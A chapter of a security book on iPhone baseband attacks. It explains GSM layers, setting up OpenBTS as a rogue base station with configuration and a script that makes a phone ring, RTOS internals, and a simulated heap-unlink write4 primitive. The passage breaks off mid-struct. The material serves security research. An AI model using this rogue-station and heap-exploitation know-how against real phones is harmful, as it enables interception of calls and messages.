Chapter 11

Baseband Attacks

The communication stack for cellular networks in iOS devices is running on a dedicated chip, the so-called digital baseband processor. Having control over the baseband side of an iPhone allows an adversary to perform a variety of interesting attacks related to the “phone” part of a device, such as monitoring incoming and outgoing calls, performing calls, sending and intercepting short messages, intercepting IP traffic, as well as turning the iPhone into a remotely activated microphone by activating its capability to auto-answer incoming calls. This chapter explores how memory corruptions can be triggered in the baseband software stack and how an attacker can execute custom code on the baseband processor. To attack a device over the air, an adversary would operate a rogue base station in close enough proximity to the target device such that the two can communicate (see Figure 11.1).

Figure 11.1 Basic scenario for a remote baseband attack

But baseband attacks do not necessarily need to be remote attacks. For a long time, the driving factor for memory corruption research in the baseband stack was the demand for unlocking iPhones; in many countries iPhones are sold at a subsidized price when users buy them bundled with a long-term contract with a carrier. The downside of this practice is that the phone will work only with SIM cards from the carrier that sold the phone. This check — the network lock — is enforced in the baseband processor of the telephone, which talks to the SIM card. The memory corruptions exploited in this context are described as local vulnerabilities when contrasted to the vulnerabilities that can be exploited over the air.

This chapter is concerned only with attacks over the Global System for Mobile Communications (GSM) air interface and local attacks through the AT command parser. Although, in principle, attacks over the Code Division Multiple Access (CDMA) air interface might be possible as well, hardware and software for setting up rogue CDMA base stations are much harder to acquire, and attacks against the Qualcomm CDMA stack have neither been studied by us nor publicly demonstrated by anyone else thus far. Similarly, although cellular networks in generations later than GSM, such as Universal Mobile Telecommunications System (UMTS) and Long Term Evolution (LTE), provide a much richer attack surface, they are not considered in this chapter.

But before getting to the gist of the attacks we describe, we take a brief look at the target environment. Just like the application processor, the baseband processor is an ARM-based CPU; however, it does not run iOS but rather a dedicated real-time operating system (RTOS). Different generations of iPhones and iPads use different baseband processors and RTOSes. Table 11.1 gives an overview of which one is used in which device.

Note
In fact, the baseband processor contains a processing unit other than the CPU: a DSP for modulation/demodulation of the physical layer. In the case of the S-Gold 2, this is a Teaklite core; in other cases, it is an ARM7TDMI design.

Table 11.1 Digital Baseband Processors used in iOS Devices

Processor                                  Devices                              RTOS
Infineon S-Gold 2 (ARM 926)                iPhone 2G                            Nucleus PLUS (Mentor Graphics)
Infineon X-Gold 608 (ARM 926)              iPhone 3G/3GS, iPad 3G (GSM)         Nucleus PLUS (Mentor Graphics)
Infineon X-Gold 618 (ARM 1176)             iPhone 4, iPad 2 3G (GSM)            ThreadX (Express Logic)
Qualcomm MDM6600 (ARM 1136)                iPhone 4 (CDMA), iPad 2 3G (CDMA)    REX on OKL4 (Qualcomm)
Qualcomm MDM6610 (variation of MDM6600)    iPhone 4S                            REX on OKL4 (Qualcomm)

GSM Basics

GSM is a suite of standards for digital cellular communications. It was developed in the 1980s by the European Conference of Postal and Telecommunications Administrations (CEPT); in 1992, development was moved over to the European Telecommunications Standards Institute (ETSI). GSM is considered a second-generation wireless telephony technology and is used to serve more than two billion cellular subscribers in more than 200 countries.

The International Telecommunication Union (ITU) has assigned a total of 14 different frequency bands to the GSM technology; however, only four of them are relevant. In North America, GSM-850 and GSM-1900 are used. In the rest of the world, with the exception of South and Central America, GSM-900 and GSM-1800 are used. In South America, GSM-850 and GSM-1900 are primarily used; however, there are a number of exceptions. All of the GSM-enabled iOS devices are quad-band devices supporting GSM-850, GSM-900, GSM-1800, and GSM-1900. Regardless of where you turn on your device, all channels on all four bands are scanned for valid signals.

Let us now quickly dissect the GSM protocol stack. On the physical layer, GSM uses Gaussian Minimum Shift Keying (GMSK) as a modulation scheme; the channels are 200 kHz wide and use a bit rate of approximately 270.833 kbit/s. Both Frequency Division Multiple Access (FDMA) and Time Division Multiple Access (TDMA) are employed. To enable simultaneous sending and receiving, a technique called Frequency Division Duplex is employed: Transmission between the Mobile Station (MS) and the Base Transceiver Station (BTS) is achieved on two different frequencies separated by a fixed duplex distance for each band. Data transmitted from the MS to the BTS is sent on the uplink; correspondingly, the opposite direction is called the downlink. On top of the physical channels defined by the preceding TDMA scheme, layer 1 of the air interface lays a number of logical channels that are mapped onto the physical channels by multiplexing. Many different types of logical channels exist (which we do not describe in further detail here), but they can be neatly split into two categories: traffic channels for the transport of user data and signaling channels that transport signaling information, such as location updates, between the BTS and the MS.

Going up in the GSM protocol stack on the Um interface you arrive at layer 2, on which LAPDm, a derivative of ISDN's LAPD (ITU Q.921) and reminiscent of HDLC, is spoken. Data transmitted on layer 2 is encapsulated either in unnumbered information frames (if acknowledgment, flow control, and layer 2 error correction are not needed) or in information frames (positive acknowledgment, flow control, and layer 2 error control provided). A layer 2 Connection End Point (CEP) is denoted by a so-called Data Link Connection Identifier (DLCI), which consists of two elements: a Service Access Point Identifier (SAPI) and a Connection Endpoint Identifier (CEPI).

The next layer of the cellular stack is layer 3, which is divided into three sublayers: Radio Resource Management (RR), Mobility Management (MM), and Connection Management (CM). The RR layer is responsible for the establishment of a link between the MS and the MSC and allocates and configures dedicated channels for this. The MM layer handles all aspects related to the mobility of the device, such as location management, but also authentication of the mobile subscriber. The CM layer can again be split into three distinct sublayers, which are not stacked on top of each other but rather are side by side: Call Control (CC) is the sublayer responsible for functions such as call establishment and teardown. The other sublayers are Supplementary Services (SS) and Short Message Service (SMS). The last two sublayers are independent of calls. See Figure 11.2 for an overview of the GSM Um interface as served by the cellular stack running on the baseband processor.

Figure 11.2 GSM Um interface layers

Setting up OpenBTS

In recent years, two open-source projects appeared that began building solutions for setting up and running GSM networks. This has significantly lowered the entry cost for performing GSM security research; in fact, one could say that this was the key event enabling baseband attacks to become practical for the average hacker. Although the two projects, OpenBSC and OpenBTS, are similar in their goals, they take different approaches. Whereas OpenBSC uses existing, commercially available GSM base transceiver stations (BTSes) and acts as a base station controller (BSC), OpenBTS uses a software-defined radio (the USRP platform) to run a GSM base station completely in software, including modulation and demodulation. OpenBTS reduces the hardware cost of running a GSM base station to less than USD 2000. Next, we detail how to set up your own little GSM network for testing purposes.

Note
GSM operates in a licensed frequency spectrum. Without having obtained permission from the local regulatory authority, it is illegal to operate a GSM base station in almost any country. Please check with your legal counsel and local regulatory authorities and obtain the required license(s) before continuing.

Hardware Required

OpenBTS uses a software-defined radio approach to implement the BTS side of the Um interface. To operate a GSM network with OpenBTS, you currently need a Universal Software Radio Peripheral (USRP) by Ettus Research, LLC (now owned by National Instruments); in the future OpenBTS might support a larger number of software-defined radios. A USRP contains several analog-digital converters (ADCs) and digital-analog converters (DACs) connected to an FPGA. This, in turn, communicates with the host computer through a USB or a Gigabit Ethernet interface, depending on the model. The actual RF hardware is contained in so-called daughterboards that are mounted onto the USRP mainboard. Ettus sells several transceiver daughterboards covering the GSM frequency ranges, namely the RFX900 covering 750 MHz to 1050 MHz, the RFX1800 covering 1.5 GHz to 2.1 GHz, and the WBX board covering 50 MHz to 2.2 GHz. All of these daughterboards can send and receive at the same time. However, note that when operating the USRP with a single daughterboard, significant leakage of the transmitted signal into the receive circuit occurs, effectively limiting the range of your system. The recommended configuration is to run OpenBTS with two RFX daughterboards. Another thing to note is that RFX1800 daughterboards can be converted into RFX900 daughterboards by simply reflashing their EEPROM. However, the RFX900 daughterboards contain a filter that suppresses the signal outside of the 900 MHz ISM band (frequency range: 902–928 MHz). Therefore, if you bought an RFX900 daughterboard for the transmit side, you need either to remove the ISM filter by de-soldering it or to restrict yourself to ARFCNs 975-988 in the EGSM900 band.
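To see why ARFCNs 975-988 are the ones that pass the ISM filter, it helps to convert channel numbers into carrier frequencies. The following is a minimal sketch using the standard GSM channel numbering formulas; the function and table names are our own, the EGSM extension range (975-1023) is treated as a separate table entry for simplicity, and a channel is assumed to fit the filter only if the whole 200 kHz channel lies inside 902–928 MHz.

```python
# Band plan in units of 100 kHz (integers avoid floating-point rounding):
# name -> (first ARFCN, last ARFCN, uplink base, reference ARFCN, duplex distance)
BANDS = {
    "GSM-850":   (128, 251,   8242,  128, 450),
    "P-GSM-900": (1,   124,   8900,  0,   450),
    "E-GSM-900": (975, 1023,  8900,  1024, 450),  # extension range only
    "GSM-1800":  (512, 885,   17102, 512, 950),
    "GSM-1900":  (512, 810,   18502, 512, 800),
}

ISM_LOW_KHZ, ISM_HIGH_KHZ = 902_000, 928_000
CHANNEL_KHZ = 200


def arfcn_to_khz(band, arfcn):
    """Return (uplink_khz, downlink_khz) carrier frequencies for an ARFCN."""
    first, last, base, ref, duplex = BANDS[band]
    if not first <= arfcn <= last:
        raise ValueError("ARFCN %d is not part of %s" % (arfcn, band))
    uplink = base + 2 * (arfcn - ref)          # 200 kHz channel raster
    return uplink * 100, (uplink + duplex) * 100


def downlink_in_ism(band, arfcn):
    """True if the whole downlink channel fits inside the 902-928 MHz band."""
    _, downlink = arfcn_to_khz(band, arfcn)
    half = CHANNEL_KHZ // 2
    return ISM_LOW_KHZ <= downlink - half and downlink + half <= ISM_HIGH_KHZ


# The BTS transmits on the downlink, so that is the side the filter affects.
usable = [n for n in range(975, 1024) if downlink_in_ism("E-GSM-900", n)]
print(usable[0], usable[-1])
```

Because the GSM-1800 and GSM-1900 channel numbers overlap, the band has to be given explicitly, just as OpenBTS asks for both a band and an ARFCN in its configuration.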

Unfortunately, the internal clock of the USRP devices is too imprecise to allow reliable operation with anything but the most tolerant of cellphones. Additionally, operating the USRP at 64 MHz for GSM isn't recommended; instead you should use a multiple of the GSM symbol rate to make downsampling more efficient. For GSM, usually a reference clock of 13 MHz (48 times the GSM bit rate) or 26 MHz is used to achieve this in handsets, and for the USRP the most common option is to use a 52 MHz clock. You can feed an external clock signal to the USRP to deal with both of these issues. Please note that feeding an external clock to a USRP1 needs a reclocking modification of the USRP1 motherboard that involves some surface mount soldering. These steps are described on the ClockTamer installation page (https://code.google.com/p/clock-tamer/wiki/ClockTamerUSRPInstallation). The ClockTamer is a small clock generator with optional GPS synchronization that is manufactured by a Russian company called FairWaves; at the same time, it is an open source hardware project. This module fits neatly into the USRP enclosure.
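The clock arithmetic behind this recommendation is easy to check. The short sketch below (names are ours) uses exact fractions to compute how many clock cycles fall into one GSM symbol period for the clock rates mentioned above; an integer result means the sample stream can be decimated by a whole number.

```python
from fractions import Fraction

# The GSM symbol rate is defined as 13 MHz / 48, approximately 270.833 kHz.
GSM_SYMBOL_RATE = Fraction(13_000_000, 48)


def cycles_per_symbol(clock_hz):
    """Exact number of clock cycles per GSM symbol period."""
    return Fraction(clock_hz) / GSM_SYMBOL_RATE


for clock_hz in (13_000_000, 26_000_000, 52_000_000, 64_000_000):
    ratio = cycles_per_symbol(clock_hz)
    kind = "integer" if ratio.denominator == 1 else "fractional"
    print("%d Hz: %s cycles per symbol (%s)" % (clock_hz, ratio, kind))
```

Only the 64 MHz clock yields a fractional ratio (3072/13), which is why it forces a more expensive resampling step.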

For newer USRPs, such as the USRP2, E1x0, N2x0, and B1x0, reclocking modifications are not necessary; the clock signal can simply be fed into the external clock input. However, note that to operate these you will need a version of OpenBTS supporting UHD devices.

Note
UHD devices are supported by default in OpenBTS 2.8 and later, but not in OpenBTS 2.6. An OpenBTS 2.6 fork supporting UHD devices exists on GitHub: https://github.com/ttsou/openbts-uhd.

OpenBTS Installation and Configuration

We show you how to install OpenBTS and set up a minimal configuration for playing the role of a malicious base station. The accompanying materials for this book (www.wiley.com/go/ioshackershandbook) include a VirtualBox image that installs all of the dependencies required to operate a USRP1 with a 52MHz clock on first boot and then can be used as a self-contained playground for testing baseband attacks.

The following is a unified diff between the example configuration included in the OpenBTS 2.6 distribution and the configuration used later in this chapter:

--- OpenBTS.config.example      2012-03-12 11:20:43.993739075 +0100
+++ OpenBTS.config      2012-03-12 11:31:27.029729225 +0100
@@ -30,3 +30,3 @@
 # The initial global logging level: ERROR, WARN, NOTICE, INFO, DEBUG, DEEPDEBUG
-Log.Level NOTICE
+Log.Level INFO
 # Logging levels can also be defined for individual source files.
@@ -86,4 +86,4 @@
 # YOU MUST HAVE A MATCHING libusrp AS WELL!!
-TRX.Path ../Transceiver/transceiver
-#TRX.Path ../Transceiver52M/transceiver
+#TRX.Path ../Transceiver/transceiver
+TRX.Path ../Transceiver52M/transceiver
 $static TRX.Path
@@ -182,3 +182,3 @@
 # Things to query during registration updates.
-#Control.LUR.QueryIMEI
+Control.LUR.QueryIMEI
 $optional Control.LUR.QueryIMEI
@@ -197,3 +197,3 @@
 # Maximum allowed ages of a TMSI, in hours.
-Control.TMSITable.MaxAge 72
+Control.TMSITable.MaxAge 24

@@ -259,3 +259,3 @@
 # Location Area Code, 0-65535
-GSM.LAC 1000
+GSM.LAC 42
 # Cell ID, 0-65535
@@ -286,5 +286,5 @@
 # Valid ARFCN range depends on the band.
-GSM.ARFCN 51
+#GSM.ARFCN 51
 # ARCN 975 is inside the US ISM-900 band and also in the GSM900 band.
-#GSM.ARFCN 975
+GSM.ARFCN 975
 # ARFCN 207 was what we ran at BM2008, I think, in the GSM850 band.
@@ -295,3 +295,3 @@
 # Should probably include our own ARFCN
-GSM.Neighbors 39 41 43
+GSM.Neighbors 39 41 975
 #GSM.Neighbors 207

Please take care to adjust GSM.ARFCN, GSM.Band, and GSM.Neighbors according to the frequency that you have been authorized to transmit on.

Note that by default you are running OpenBTS in a so-called open configuration, meaning that any mobile device that tries to register with the test network will be allowed to. This may have unwanted side effects, especially if you have not properly limited your transmission power and/or are in an area where other networks have only weak signals: devices may inadvertently roam into your network. To prevent this, you can run OpenBTS in a closed configuration that requires each IMSI to be registered with Asterisk.

After having connected your hardware, you should perform a simple check to see whether everything is set up correctly. For this test, you can use the testcall functionality that you will later also use to transmit raw GSM layer 3 messages. First, install the libmich library (from https://github.com/mitshell/libmich, not required if you use the virtual machine provided), a nifty library to create layer 3 messages using a Python interface. Next, start OpenBTS and register your iPhone with the test network. To select the test network, disable the automatic selection of the network in the Carrier section of the Settings application and choose the mobile network with the name 00101.

If you have trouble seeing or registering with your test network, it can help to put the iPhone into airplane mode for at least 5 seconds. Disable airplane mode after that and perform the network selection procedure again; your phone will now perform a full scan.

After having registered with the network, you can simulate the first stage of a call establishment. Use the following commands to set up a traffic channel to the iPhone:

OpenBTS> tmsis
TMSI       IMSI            IMEI(SV)           age  used
0x4f5e0ccc 262XXXXXXXXXXXX 01XXXXXXXXXXXXXX  293s  293s

1 TMSIs in table
OpenBTS> testcall 262XXXXXXXXXXXX 60

OpenBTS> calls
1804289383 TI=(1,0) IMSI=262XXXXXXXXXXXX Test from=0 Q.931State=active
SIPState=Null (2 sec)
1 transactions in table

In the previous example, the command tmsis shows a mapping of the Temporary Mobile Subscriber Identity (TMSI) of the registered iPhone to its International Mobile Subscriber Identity (IMSI) together with the International Mobile Equipment Identity and Software Version (IMEISV) as well as the time of initial registration and the time of last use. The testcall command opens a UDP socket (by default on port 28670) and a traffic channel to the mobile device specified by the IMSI in the first argument. The number of seconds this channel should be held open is specified in the second argument. This allows you to send datagrams to the UDP port that are forwarded as GSM layer 3 packets to the mobile device and vice versa. At any time, only a single testcall instance can be active. To see which calls are established you can use the calls command.

You then run the following simple Python script in another terminal to simulate call setup:

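import socket
from libmich.formats import *   # provides L3Mobile

TESTCALL_PORT = 28670           # default UDP port opened by the testcall command

# Send a raw layer 3 SETUP message to the UDP socket opened by testcall;
# OpenBTS forwards it to the phone over the open traffic channel.
# str() yields the raw message bytes under Python 2.
tcsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
tcsock.sendto(str(L3Mobile.SETUP()), ('127.0.0.1', TESTCALL_PORT))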

After you execute this script, your iPhone should ring. Please note that you are not following the state transitions after sending the initial call setup message; hence the phone will appear to be frozen while ringing. Simply shut down OpenBTS if this test has worked.

Closed Configuration and Asterisk Dialing Rules

You did not have to configure Asterisk in the previous description because you were operating OpenBTS in open configuration. If you want to operate OpenBTS in closed configuration or to make calls between multiple registered phones on your test network, you will need at least a basic configuration of Asterisk. As a bare minimum, you can simply append the following lines to the default extensions.conf:

[sip-openbts]
exten => 6666,1,Dial(SIP/IMSI2620XXXXXXXXXXX)
exten => 7777,1,Dial(SIP/IMSI2620YYYYYYYYYYY)

and the following lines to the default sip.conf:

[IMSI2620XXXXXXXXXXX]
callerid=6666
canreinvite=no
type=friend
context=sip-openbts
allow=gsm
host=dynamic

[IMSI2620YYYYYYYYYYY]
callerid=7777
canreinvite=no
type=friend
context=sip-openbts
allow=gsm
host=dynamic

Please make sure that both the context and the IMSI identifiers match between sip.conf and extensions.conf.
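Because a mismatch between the two files is an easy mistake to make, you may prefer to generate both fragments from a single table. The following is a minimal sketch of such a helper; the function names are hypothetical, the IMSI in the usage example is a made-up placeholder for the 00101 test network, and the output simply mirrors the stanzas shown above.

```python
def dial_rule(imsi, extension):
    """One extensions.conf line that dials the SIP peer for this IMSI."""
    return "exten => %s,1,Dial(SIP/IMSI%s)" % (extension, imsi)


def sip_peer(imsi, extension, context="sip-openbts"):
    """One sip.conf stanza for a handset identified by its IMSI."""
    return "\n".join([
        "[IMSI%s]" % imsi,
        "callerid=%s" % extension,
        "canreinvite=no",
        "type=friend",
        "context=%s" % context,
        "allow=gsm",
        "host=dynamic",
    ])


def render(subscribers, context="sip-openbts"):
    """Return (extensions.conf fragment, sip.conf fragment).

    subscribers maps a dialable extension to the IMSI of the handset.
    """
    items = sorted(subscribers.items())
    extensions = "\n".join(
        ["[%s]" % context] + [dial_rule(imsi, ext) for ext, imsi in items])
    sip = "\n\n".join(sip_peer(imsi, ext, context) for ext, imsi in items)
    return extensions, sip


# Placeholder IMSI; substitute the values shown by the tmsis command.
extensions_conf, sip_conf = render({"6666": "001010000000001"})
print(extensions_conf)
print(sip_conf)
```

Since both fragments are derived from the same dictionary, the context name and the IMSI identifiers cannot drift apart.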

RTOSes Underneath the Stacks

The cellular baseband of a modern smartphone can be seen as an independent subsystem: it runs its own operating system on its own processor with dedicated coprocessors (for example, DSPs, crypto, and 3G coprocessors). This can be attributed to the real-time requirements for cellular communications. Consequently, the operating systems running underneath the cellular stack are dedicated real-time operating systems, sometimes proprietary to the vendor of the baseband stack, as in the case of Qualcomm's REX. More commonly, however, the owner of the cellular stack has simply licensed a commercially available OS on which to run its cellular stack. The primary task of these operating systems is to manage resources such as processors, memory, and attached devices efficiently and under real-time constraints, which often makes them appear very different from a desktop operating system, although they are not.

The following sections give you a brief exposition of the three different real-time operating systems that are in use by different versions of iOS devices. They also explain how task/thread control, inter-task/thread communication and locking mechanisms, memory management, and memory protection work for each of them.

Nucleus PLUS

Nucleus PLUS is a widely used commercial RTOS distributed by Mentor Graphics. It is shipped in source form to the paying licensees. The baseband of the S-Gold 2 as well as of the X-Gold 608 run on Nucleus PLUS. Unfortunately, no good public documentation on Nucleus PLUS is available; however, the official manuals have leaked.

Units of execution in Nucleus PLUS are called tasks. Tasks can be dynamically created and deleted in Nucleus PLUS and run at a priority defined at task creation time. For each priority level, all tasks on this level are run time sliced in a round-robin fashion; they can also explicitly relinquish the processor. Tasks can preempt other tasks that have a lower priority. Preemption can be disabled — not only globally but also for each task individually. Interrupt Service Routines (ISR) are different kinds of execution units. Several different types of ISRs are distinguished. The first kind is the User ISR, which cannot use any Nucleus PLUS services and needs to save and restore the registers it uses itself. They are tied directly to an interrupt vector and are not registered through Nucleus PLUS. Next are low-level ISRs (LISRs), which are first-level interrupt handlers; and high-level ISRs (HISRs), which are second-level interrupt handlers. LISRs have only limited access to Nucleus PLUS services and are tied to an interrupt vector, whereas HISRs are scheduled similarly to tasks and may call most of the Nucleus PLUS services.

Nucleus PLUS distinguishes two different kinds of memory allocations: partition memory and dynamic memory. Both types of memories are managed in memory pools that need to be defined first before allocations can be taken from them. Tasks can be suspended when the allocation cannot be immediately performed, causing them to wait until a suitable chunk of memory becomes free. Partition memory is a form of memory that allows allocations only in fixed-sized blocks. Each call to the allocation function obtains one block of exactly that fixed size from the pool. This type of memory management is very common for embedded systems with real-time constraints because it allows memory allocations to occur with constant execution time. Moreover, partition memory is more space efficient because there is no need to store allocation meta data for the blocks. Dynamic memory, on the other hand, allows variable-sized allocations from the pool, similar to a regular malloc() implementation. (Please also consult the “Heap Implementations” section later in this chapter for the internals of the heap implementations.)
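The constant-time property of partition memory follows directly from the fixed block size. The sketch below is a simplified model of the idea, not the Nucleus PLUS implementation: the class and method names are our own, addresses are plain integers, and task suspension on an empty pool is replaced by returning None.

```python
class PartitionPool:
    """Toy model of a fixed-size block pool with O(1) allocate and free."""

    def __init__(self, start_addr, partition_size, count):
        self.partition_size = partition_size
        # Every partition has the same size, so a simple free list of
        # start addresses is all the bookkeeping that is required.
        self.free = [start_addr + i * partition_size for i in range(count)]

    def allocate(self):
        """Hand out one partition, or None if the pool is exhausted."""
        return self.free.pop() if self.free else None

    def deallocate(self, addr):
        """Return a partition to the pool."""
        self.free.append(addr)


pool = PartitionPool(start_addr=0x2000, partition_size=64, count=2)
first = pool.allocate()
second = pool.allocate()
exhausted = pool.allocate()      # a real task could suspend here instead
pool.deallocate(first)
reused = pool.allocate()
print(hex(first), hex(second), exhausted, hex(reused))
```

No search over block sizes is ever needed, which is what distinguishes this scheme from the variable-sized dynamic memory pools.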

For task synchronization and mutual exclusion, semaphores can be used. The semaphores implemented by Nucleus PLUS are counting semaphores.

Several means exist for tasks to communicate with each other. Mailboxes, which can be dynamically created and deleted, are the most primitive means for data transfer: each mailbox can hold only a single message consisting of exactly four 32-bit words. More powerful primitives are pipes and queues, which can hold multiple messages that consist of one or more bytes (pipes) or one or more 32-bit words (queues). Both variable- and fixed-length pipes and queues can be created; their type is defined at time of creation. Messages are sent and received by value and not by reference; broadcast messages are supported, and all tasks waiting for a message from a queue will wake up and receive these messages.

Other concepts for signaling and synchronization between tasks supported by Nucleus PLUS are event groups and signals. Both of these, however, have an extremely limited bandwidth.

ThreadX

ThreadX is the direct successor of Nucleus PLUS; both operating systems were written by the same software engineer, William Lamie. Just like Nucleus, ThreadX is distributed to licensees in source form, but by a different company, Express Logic. Compared to Nucleus PLUS, the complexity of the API has significantly decreased, and the interrupt architecture was overhauled. In contrast to the other operating systems described in this chapter, ThreadX is covered by a good book that describes its implementation in detail: Real-Time Embedded Multithreading: Using ThreadX and ARM by Edward L. Lamie (CMP, 2005; ISBN 1578201349). Due to this fact and its close relation to Nucleus PLUS, we do not further describe its idiosyncrasies in this chapter.

REX/OKL4/Iguana

Real-time Executive System (REX) is an RTOS developed by Qualcomm for its Mobile Station Modem (MSM) products. It is employed by the Advanced Mobile Subscriber Software (AMSS) running on the MDM66x0 chips. Beginning in late 2006, Qualcomm made a major design innovation to its cellular stack: An L4-derived microkernel, OKL4, was propped underneath REX. Luckily, some versions of OKL4 are freely available in source form, which significantly simplifies the analysis of AMSS.

OKL4 is merely the microkernel of the system. The actual meat of the operating system, such as virtual memory management and process management, is implemented in Iguana, an L4 server, for which source code is freely available. The unit of execution in Iguana and L4 is called a thread. In fact, Iguana threads are L4 threads and can be manipulated through the L4 API as well as through an Iguana API.

Iguana uses a single address space to make sharing of data efficient and employs per-process protection domains to enforce its security policy. A protection domain can be seen as the equivalent of a process in a traditional operating system and defines what resources a process can access.

Memory sections are contiguous ranges of virtual pages; they are the basic units of virtual memory allocation and protection in Iguana. Memory sections can be created both at boot time and at run time using memsection_create().

A significant difference between OKL4/Iguana and the other operating systems discussed in this chapter is that only the operating system and not the actual application — in our case the cellular stack — runs in supervisor mode. AMSS, including drivers, is completely run in user mode.

Heap Implementations

This section dives head first into the internals of heap memory management of the operating systems. You should already be somewhat familiar with exploiting heap buffer overflows to make use of the information presented here.

Dynamic Memory in Nucleus PLUS

Nucleus PLUS uses a simplistic first-fit allocator for managing dynamic memory. For each pool created using NU_Create_Memory_Pool(), a pool control block of the following layout is created:

struct dynmem_pcb
{
    void               *cs_prev;
    void               *cs_next;
    uint32_t            cs_prio;
    void               *tc_tcb_ptr;
    uint32_t            tc_wait_flag;
    uint32_t            id;            /* magic value ['DYNA']   */
    char                name[8];       /* Dynamic Pool name      */
    void               *start_addr;    /* Starting pool address  */
    uint32_t            pool_size;     /* Size of pool           */
    uint32_t            min_alloc;     /* Minimum allocate size  */
    uint32_t            available;     /* Total available bytes  */
    struct dynmem_hdr  *memory_list;   /* Memory list            */
    struct dynmem_hdr  *search_ptr;    /* Search pointer         */
    uint32_t            fifo_suspend;  /* Suspension type flag   */
    uint32_t            num_waiting;   /* Number of waiting tasks*/
    void               *waiting_list;  /* Suspension list        */
};

Each chunk of memory allocated with NU_Allocate_Memory() has a header of the following structure (16 bytes):

struct dynmem_hdr
{
    struct dynmem_hdr  *next_blk,        /* Next memory block      */
                       *prev_blk;        /* Previous memory block  */
    bool                is_free;         /* Memory block free flag */
    struct dynmem_pcb  *pool_pcb;        /* Dynamic pool pointer   */
};

Initially, before dynamic memory can be allocated, at least one pool needs to be created with NU_Create_Memory_Pool(pcb, name, start_addr, pool_size, min_alloc, suspend_t):

  • pcb — Pointer to the pool control block
  • name — A name for the pool, in ASCII
  • start_addr — First address in memory that can be used for allocations from this pool
  • pool_size — Size of the pool, in bytes
  • min_alloc — Minimal allocation size in bytes (smaller allocations will be rounded up to min_alloc)
  • suspend_t — Type of suspension (FIFO or not)

This call causes the pcb to be initialized, with a single chunk of size (pool_size - 2 * sizeof(struct dynmem_hdr)) ending up in the cyclic list pointed to by pcb->memory_list.

Allocating a chunk of memory with NU_Allocate_Memory(pcb, &ptr_to_allocation, size, NU_NO_SUSPEND) then causes the following algorithm to be executed:

1. Iterate over the memory list, starting at pcb->search_ptr, using a variable called mem_ptr. For each memory block, check whether the is_free flag is set. If this is the case, let memblk_size = (mem_ptr->next_blk - mem_ptr - 16) and check whether memblk_size >= size. If this is fulfilled, the algorithm has found a suitable block.
2. If no suitable block can be found, return an error condition or suspend the task (depending on whether suspension is allowed).
3. If a block was found and (memblk_size - size) > (min_alloc + 16), break the memory chunk into two chunks and insert the free remainder back into the list.
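The steps above can be sketched as a small simulation. This is a simplified model rather than the Nucleus PLUS source: the class name is ours, the cyclic linked list is replaced by a sorted Python list of header addresses, the search always starts at the head of the list instead of at search_ptr, and suspension is replaced by returning None.

```python
HDR = 16  # sizeof(struct dynmem_hdr)


class DynamicPool:
    """Toy first-fit allocator that follows the three steps described above."""

    def __init__(self, start_addr, pool_size, min_alloc):
        self.min_alloc = min_alloc
        # Each entry is [header_address, is_free]. The final entry models the
        # terminating header, so the initial chunk holds pool_size - 2 * HDR.
        self.blocks = [[start_addr, True],
                       [start_addr + pool_size - HDR, False]]

    def allocate(self, size):
        size = max(size, self.min_alloc)          # round up to min_alloc
        for i in range(len(self.blocks) - 1):     # step 1: first-fit search
            addr, is_free = self.blocks[i]
            memblk_size = self.blocks[i + 1][0] - addr - HDR
            if is_free and memblk_size >= size:
                # Step 3: split if the remainder is worth keeping.
                if memblk_size - size > self.min_alloc + HDR:
                    self.blocks.insert(i + 1, [addr + HDR + size, True])
                self.blocks[i][1] = False
                return addr + HDR                 # payload follows the header
        return None                               # step 2: no block found


pool = DynamicPool(start_addr=0x1000, pool_size=0x100, min_alloc=16)
a = pool.allocate(32)
b = pool.allocate(8)       # rounded up to min_alloc
c = pool.allocate(1000)    # does not fit
print(hex(a), hex(b), c)
```

Note how every payload is directly preceded by a header and directly followed by the header of the next block; this adjacency is what makes a heap buffer overflow in one chunk corrupt the list pointers of its neighbor.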

To deallocate a memory block using NU_Deallocate_Memory(blk), the deallocation function assumes that blk is preceded by a dynmem_hdr.

No checks are performed on the dynmem_hdr structure itself, but it is checked that the pool pointer is not NULL, and that the magic value in the pool control block matches. After having marked the block as free again and having adjusted the number of available bytes in the pool, the function first checks whether the freed block can be merged with its previous block, then it checks whether it can be merged with the next block by looking at the is_free flags of the header of these blocks. This procedure is commonly called coalescing. This is the operation that gives an attacker a so-called unrestricted write4 primitive, a powerful way to turn a heap buffer overflow into the ability to write an arbitrary 32-bit value at any location in memory.
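To make the write4 primitive concrete, the following sketch simulates an unchecked doubly linked list removal on a small byte array. It is a generic illustration of the technique and not the Nucleus PLUS coalescing code; the helper names and all addresses are made up, and only the field offsets of next_blk (0) and prev_blk (4) are taken from the header layout shown earlier.

```python
import struct

HDR_NEXT, HDR_PREV = 0, 4   # offsets of next_blk and prev_blk in dynmem_hdr


def read32(mem, addr):
    return struct.unpack_from("<I", mem, addr)[0]


def write32(mem, addr, value):
    struct.pack_into("<I", mem, addr, value)


def unlink(mem, blk):
    """Remove blk from a doubly linked list without any sanity checks."""
    nxt = read32(mem, blk + HDR_NEXT)
    prv = read32(mem, blk + HDR_PREV)
    write32(mem, nxt + HDR_PREV, prv)   # next->prev_blk = prev
    write32(mem, prv + HDR_NEXT, nxt)   # prev->next_blk = next


mem = bytearray(0x100)                  # stand-in for baseband RAM
victim = 0x20                           # header overwritten by the overflow
target = 0x80                           # where the attacker wants to write
value = 0xC0                            # what the attacker wants to write

# The overflow plants attacker-chosen pointers in the victim header.
write32(mem, victim + HDR_NEXT, target - HDR_PREV)
write32(mem, victim + HDR_PREV, value)

unlink(mem, victim)
print(hex(read32(mem, target)))
```

The second store in unlink() is a side effect the attacker has to live with: it writes the fake next pointer to the address given by value, so value must itself point to writable memory.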

Byte Pools in ThreadX

ThreadX also uses a first-fit allocator that works in a very similar fashion to the one described for Nucleus PLUS; yet it still is distinct enough to warrant a detailed description of its own. The control block of a byte pool has the following structure (taken from tx_api.h):

typedef struct TX_BYTE_POOL_STRUCT
{
    /* Define the byte pool ID used for error checking.  */
    ULONG       tx_byte_pool_id;
    /* Define the byte pool's name.  */
    CHAR_PTR    tx_byte_pool_name;
    /* Define the number of available bytes in the pool.  */
    ULONG       tx_byte_pool_available;
    /* Define the number of fragments in the pool.  */
    ULONG       tx_byte_pool_fragments;
    /* Define the head pointer of byte pool.  */
    CHAR_PTR    tx_byte_pool_list;
    /* Define the search pointer used for initial searching for memory
       in a byte pool.  */
    CHAR_PTR    tx_byte_pool_search;
    /* Save the start address of the byte pool's memory area.  */
    CHAR_PTR    tx_byte_pool_start;
    /* Save the byte pool's size in bytes.  */
